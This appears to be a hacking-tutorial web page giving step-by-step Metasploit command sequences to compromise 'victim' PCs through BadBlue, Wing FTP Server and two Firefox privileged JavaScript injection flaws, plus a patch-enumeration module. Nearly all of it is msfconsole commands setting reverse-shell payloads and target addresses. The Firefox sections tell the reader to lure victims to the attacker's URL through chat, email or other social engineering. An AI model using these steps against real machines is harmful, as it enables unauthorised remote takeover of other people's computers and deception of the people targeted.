Hack Remote Windows PC using BadBlue Exploit

BadBlue is software which can use for photos, videos, music, and business files with friends and colleagues instantly.

First scan badblue service the victim pc using nmap –sV 192.168.1.2

Open Kali terminal type msfconsole

Now type use exploit/windows/http/badblue_passthru

msf exploit (badblue_passthru)>set rhost 192.168.1.2 (Victim IP)

msf exploit (badblue_passthru)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (badblue_passthru)>exploit  

How to Gather Applied Patches in Remote Windows PC

This module will attempt to enumerate which patches are applied to a windows system based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/gather/enum_patches

msf exploit (enum_patches)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_patches)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (enum_patches)>set session 1

msf exploit (enum_patches)>exploit

Hack Remote Windows PC using Wing FTP Server Authenticated Command Execution

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets

Wing FTP 4.3.8

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/wing_ftp_admin_exec

msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp

msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)

msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)

msf exploit (wing_ftp_admin_exec)>set username rajchandel

msf exploit (wing_ftp_admin_exec)>set password --------

msf exploit (wing_ftp_admin_exec)>exploit  

Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection

This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs

Exploit Targets

Firefox 22-27

Windows XP SP 3

Windows 7

Linux

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_webidl_injection

msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)

msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5

msf exploit (firefox_webidl_injection)>set uripath /

msf exploit (firefox_webidl_injection)>exploit

Now an URL you should give to your victim http://192.168.0.5:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote Windows, Linux, MAC PC using Firefox toString console.time Privileged JavaScript Injection

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges.

Exploit Targets

Firefox Version 15-22

Windows 7

Linux

Solaris

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_tostring_console_injection

msf exploit (firefox_tostring_console_injection)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_tostring_console_injection)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (firefox_tostring_console_injection)>set srvhost 192.168.0.104

msf exploit (firefox_tostring_console_injection)>set uripath /

msf exploit (firefox_tostring_console_injection)>exploit

Now an URL you should give to your victim http://192.168.0.104:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“